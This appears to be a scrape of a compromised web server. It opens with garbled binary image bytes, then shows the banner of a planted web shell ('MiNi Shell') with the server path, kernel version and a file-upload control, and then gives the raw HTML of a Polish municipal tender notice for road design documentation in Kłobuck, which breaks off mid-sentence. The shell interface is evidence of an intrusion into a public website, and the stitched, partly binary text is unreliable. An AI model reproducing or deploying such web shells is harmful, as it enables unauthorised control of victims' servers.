JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241218/0066109701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie kompletnej dokumentacji projektowo – kosztorysowej pn.: Projekt ul. Jesionowej 470 095S w Kłobucku wraz z pełnieniem nadzoru autorskiego oraz aktualizacją kosztorysów inwestorskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KŁOBUCK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398273</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kłobuck</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343100150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaklobuck.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gminaklobuck.pl/main/index.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie kompletnej dokumentacji projektowo – kosztorysowej pn.: Projekt ul. Jesionowej 470 095S w Kłobucku wraz z pełnieniem nadzoru autorskiego oraz aktualizacją kosztorysów inwestorskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff0a3f5d-6a35-4773-96e3-64768f656dcb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00661097</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00001792/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Projekt przebudowy ul. Jesionowej w Kłobucku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Z zastrzeżeniem postanowień zawartych w rozdziale IX SWZ oraz w ust. 4 i w ust. 6<br/>rozdziału VIII SWZ, komunikacja między Zamawiającym a<br/>Wykonawcami będzie przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz pocztą<br/>elektroniczną na adres e-mail<br/>Zamawiającego: sekretariat@gminaklobuck.pl oraz adresy e-mail Wykonawców podane w formularzach ofertowych. Na wskazany<br/>adres e-mail Zamawiającego<br/>Wykonawca będzie mógł przesyłać wyłącznie dokumenty zamówienia opatrzone stosownym podpisem elektronicznym.<br/>2. Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl<br/>3. Ofertę składa się pod rygorem nieważności wyłącznie poprzez Platformę e-Zamówienia, zgodnie z wyborem Wykonawcy: w<br/>formie elektronicznej (oznacza to<br/>postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym), lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>4.Pozostałe informacje zostały zamieszczone w Rozdziale IX SWZ.<br/>5. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@gminaklobuck.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2023r. poz. 57 z późn. zm.), z<br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7.Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych skompresowanych (w tym<br/>oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia<br/>2012r. (t.j. Dz.U. z 2017r., poz. 2247) w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Powyższe<br/>oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym oferty) skompresowanych formatem .rar<br/>8. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W<br/>zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Burmistrz Kłobucka z siedzibą ul.<br/>11 Listopada 6, 42-100 Kłobuck,<br/>tel. (34) 31 00 150, e-mail: sekretariat@gminaklobuck.pl<br/>2. Administrator – wyznaczył Inspektora ochrony danych – Pan Jacek Orłowski, z którym może się Pani/Pan skontaktować poprzez<br/>adres e-mail:<br/>iod@gminaklobuck.pl lub pisemnie pod adresem: 42-100 Kłobuck ul. 11 Listopada 6. Z inspektorem ochrony danych można się<br/>kontaktować we wszystkich<br/>sprawach dotyczących przetwarzania danych osobowych w szczególności w zakresie korzystania z praw związanych z ich<br/>przetwarzaniem.<br/>3. Pani/Pana dane osobowe przetwarzane są w celu realizacji ustawowych zadań Urzędu wynikających z przepisów prawa tj.: -<br/>ustawa o samorządzie gminnym, -<br/>ustawa Prawo zamówień publicznych, - ustawa Prawo o aktach stanu cywilnego, - ustawa o zmianie imienia i nazwiska, - ustawa o<br/>ewidencji ludności, - ustawa o<br/>dowodach osobistych, - ustawa o podatkach i opłatach lokalnych, - ustawa o podatku leśnym, - ustawa o podatku rolnym, - ustawa o<br/>wychowaniu w trzeźwości i<br/>przeciwdziałaniu alkoholizmowi, - ustawa o utrzymaniu porządku i czystości w gminach, - ustawa o gospodarce nieruchomościami, -<br/>ustawa prawo budowlane, -<br/>ustawa o planowaniu i zagospodarowaniu przestrzennym, - ustawa Kodeks cywilny, - ustawa o pracownikach samorządowych, -<br/>ustawa o Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej (CEIDG), - ustawa o ochronie przyrody, - ustawa o ochronie środowiska, - ustawa o<br/>publicznym transporcie zbiorowym, -<br/>ustawa Prawo wodne, - ustawa o dostępie do informacji publicznej, - ustawa Prawo geodezyjne i kartograficzne, - ustawa o<br/>rachunkowości, - ustawa o finansach<br/>publicznych, - ustawa Ordynacja podatkowa, - ustawa o zwrocie podatku akcyzowego, - ustawa Prawo oświatowe, - ustawa o<br/>usługach turystycznych, - ustawa o<br/>systemie informacji oświatowej, - ustawa o promocji zatrudnienia i instytucjach rynku pracy, - ustawa o praktykach absolwenckich, -<br/>ustawa Prawo o ustroju sądów,<br/>- ustawa o powszechnym obowiązku obrony RP, - ustawa o statystyce publicznej, - ustawa o ubezpieczeniach majątkowych i<br/>osobowych, - ustawa o ochronie praw<br/>lokatorów, - ustawa o drogach publicznych, - ustawa Kodeks Postępowania Administracyjnego, - ustawa o petycjach, - ustawa o<br/>pomocy obywatelom Ukrainy w<br/>związku z konfliktem zbrojnym na terytorium tego państwa.<br/>Podstawą prawną przetwarzania Pani/Pana danych jest: - art.6 ust.1 lit. b RODO (przetwarzanie jest niezbędne do wykonania<br/>umowy, której stroną jest osoba,<br/>której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy), - art.6 ust.1 lit. c<br/>RODO (przetwarzanie jest<br/>niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze), - art.6 ust.1 lit. e RODO (przetwarzanie jest<br/>niezbędne do wykonania zadania<br/>realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej Administratorowi).<br/>4. Pani/ Pana dane mogą być udostępnione podmiotom: - upoważnionym na podstawie przepisów prawa, - przetwarzającym dane<br/>na zlecenie i w imieniu<br/>Administratora, na podstawie zawartej umowy powierzenia przetwarzania danych osobowych, w celu świadczenia określonych w<br/>umowie usług.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Pani/Pana dane będą przechowywane: - do momentu wygaśnięcia obowiązku<br/>przechowywania danych wynikającego<br/>z przepisów prawa, - przez okres niezbędny do realizacji określonego celu/celów, lecz nie krócej niż przez okres wskazany w<br/>przepisach o archiwizacji lub innych<br/>przepisach prawa, - do czasu cofnięcia zgody, w przypadku przetwarzania danych na podstawie wyrażonej zgody.<br/>2. Pani/Pana prawa związane z przetwarzaniem danych osobowych:<br/>1) Do żądania od Administratora dostępu do swoich danych osobowych oraz prawo ich sprostowania, usunięcia lub ograniczenia<br/>przetwarzania, prawo wniesienia<br/>sprzeciwu wobec ich przetwarzania oraz prawo do przenoszenia danych.<br/>2) Jeśli przetwarzanie odbywa się na podstawie zgody, do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania, którego<br/>dokonano na podstawie zgody przed jej cofnięciem.<br/>3) Do wniesienia skargi do organu nadzorczego tj. Prezes Urzędu Ochrony Danych Osobowych /PUODO/ ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że<br/>przetwarzanie dotyczących jej(-jego) danych osobowych narusza przepisy RODO.<br/>3. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>4. Podanie danych osobowych jest: - niezbędne i wynika z wyżej wskazanych przepisów prawa, - jest dobrowolne w przypadku<br/>danych nieobowiązkowych.<br/>5. Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało zautomatyzowanemu poodejmowaniu<br/>decyzji, w tym profilowaniu, o którym<br/>mowa w art. 22 ust. 1 i 4 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.060.2024.CK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest opracowanie i wykonanie kompletnej dokumentacji projektowo – kosztorysowej w<br/>zakresie przebudowy odcinka drogi gminnej nr 470 095S, oznaczonego od skrzyżowania ul. Staszica (dz. nr ew. 535 obręb<br/>008 Zakrzew) do skrzyżowania z ul. Kasztanową (dz. nr ew. 115/2 obręb 003 Niwa Skrzeszów) Początek zakresu<br/>opracowania został przedstawiony na rys. 1 w załączniku 1 (rejon skrzyżowania ul. Staszica z ul. Jesionową), a koniec<br/>opracowania został przedstawiony na rys. 5 w załączniku 1.<br/>Orientacyjna długość odcinka przebudowy drogi wynosi około 1300,00 mb. Przedmiotowy odcinek przebudowy drogi został<br/>udokumentowany na aktualnych fotografiach zdjęciowych stanowiących załącznik 3. Ponadto w załączniku 1 przedstawiono<br/>„poglądowe mapki” przedstawiające: orientacyjną długość przedmiotowego odcinka drogi, skrzyżowania w obrębie odcinka<br/>ul. Staszica oraz istniejącą infrastrukturę techniczną. Bezpośredni dostęp do zasobów mapy jest możliwy pod następującym<br/>adresem internetowym: https://mapy.powiatklobucki.pl .<br/>Działka nr ew. 27 obręb 003 Niwa Skrzeszów przyległa do ul. Jesionowej została ujęta w miejscowym planie<br/>zagospodarowania przestrzennego terenu w Kłobucku obręb Smugi – Uchwała Nr 37/V/1998 Rady Miejskiej w Kłobucku z<br/>dnia 27 maja 1998 r. stanowiąca załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.4. Zamawiający przewiduje, że na etapie realizacji zamówienia, będzie korzystał z prawa opcji. Zgodnie z regulacjami<br/>ustawowymi, rozszerzenie zamówienia poza jego minimalny poziom jest uprawnieniem, a nie obowiązkiem Zamawiającego i<br/>będzie realizowane w miarę zaistniałej potrzeby. Dlatego też Zamawiający, zastrzegając prawo opcji:<br/>1) gwarantuje, że przedmiot umowy, który ma zostać obligatoryjnie wykonany to:<br/>a) opracowanie kompletnej dokumentacji projektowo – kosztorysowej przebudowy odcinka drogi gminnej nr 470 095S,<br/>oznaczonego od skrzyżowania ul. Staszica (dz. nr ew. 535 obręb 008 Zakrzew) do skrzyżowania z ul. Kasztanową (dz. nr<br/>ew. 115/2 obręb 003 Niwa Skrzeszów)<br/>b) dokonanie podziału 52 działek wynikające z zastosowania „Specustawy drogowej”.<br/>2) przewiduje możliwość zlecenia w ramach maksymalnego poziomu zamówienia następujących czynności:<br/>a) pełnienia nadzoru autorskiego w trakcie realizacji robót budowlanych i zakłada do 5 planowanych pobytów na budowie<br/>oraz do 5 nadzorów rysunkowych;<br/>b) jednokrotnej aktualizacji kosztorysów inwestorskich w przypadku, gdy przed rozpoczęciem procedury przetargowej,<br/>dotyczącej robót budowlanych, wystąpi taka konieczność, z zastrzeżeniem, że Wykonawca ma obowiązek zaktualizować<br/>kosztorysy inwestorskie w terminie wskazanym przez Zamawiającego w pisemnym wezwaniu przesłanym przez<br/>Zamawiającego za pomocą poczty elektronicznej lub faksu.<br/>c) dokonanie podziału dodatkowo do 10 działek (oprócz działek ujętych w ppkt.1 litera a) wynikające z zastosowania<br/>„Specustawy drogowej” <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami: a) łączna cena ofertowa (brutto) za realizację całego przedmiotu zamówienia – 60 %,<br/>b) doświadczenie projektantów – 40 %.<br/>2. Każdy z Wykonawców w poszczególnych kryteriach otrzyma odpowiednią liczbę punktów, wyliczoną w następujący sposób:<br/>a) cena ofertowa - wg następującego wzoru:<br/>Cn<br/>K(c) = ----- x 100<br/>Cb<br/>gdzie poszczególne litery oznaczają:<br/>K(c) – liczba punktów,<br/>Cn – cena ofertowa najniższa spośród wszystkich rozpatrywanych i nieodrzuconych ofert,<br/>Cb – cena ofertowa oferty badanej (przeliczanej),<br/>b) doświadczenie projektanta – K(d) :<br/>Wykonawca w ramach tego kryterium zobowiązany jest do wykazania doświadczenia poszczególnych osób wchodzących w skład<br/>zespołu projektantów, którzy będą brali udział w realizacji zamówienia, i którzy posiadają uprawnienia do projektowania w zakresie<br/>objętym przedmiotem postępowania. Zgodnie z tym Wykonawca może uzyskać max. 100 punktów. Punkty w niniejszym kryterium<br/>będą przyznawane na podstawie zadeklarowanego przez Wykonawcę w pkt. 5 tabeli Formularza oferty, doświadczenie projektanta i<br/>obliczone wg następującego wzoru:<br/>Pi(P) = PBD + PBI<br/>gdzie poszczególne składniki oznaczają:<br/>1) PBD - dodatkowe doświadczenie projektanta w specjalności drogowej<br/>W przypadku, gdy Wykonawca wykaże, że osoba wskazana w druku oferty, posiadająca uprawnienia budowlane do projektowania w<br/>specjalności inżynieryjnej drogowej dysponuje doświadczeniem projektanta nabytym przy opracowaniu dokumentacji projektowych w<br/>zakresie budowy i/lub przebudowy i/lub rozbudowy drogi publicznej w rozumieniu przepisów ustawy z dnia 21 marca 1985 r. o<br/>drogach publicznych (Dz. U. z 2024r., poz. 320 t.j. z dnia 2024.03.06), o zaprojektowanej długości jezdni min. 300,00 metrów o<br/>nawierzchni twardej, ulepszonej a dokumentacje te były wykonane przed upływem terminu składania ofert, to Wykonawca otrzyma<br/>następującą ilość punktów:<br/>• za opracowanie jednej dokumentacji projektowej spełniającej w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 0 punktów;<br/>• za opracowanie dwóch dokumentacji projektowych spełniających w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 60 punktów;<br/>• za opracowanie czterech dokumentacji projektowych spełniających w/w wymagania to wartość liczbowa ocenianego kryterium<br/>uzyskanego dla danej oferty wyniesie 100 punktów;<br/>2) PBI - dodatkowe doświadczenie projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>W przypadku, gdy Wykonawca wykaże, że osoba wskazana w druku oferty, posiadająca uprawnienia budowlane do projektowania w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych dysponuje doświadczeniem projektanta nabytym przy opracowaniu dokumentacji projektowych w zakresie budowy<br/>i/lub przebudowy i/lub rozbudowy sieci 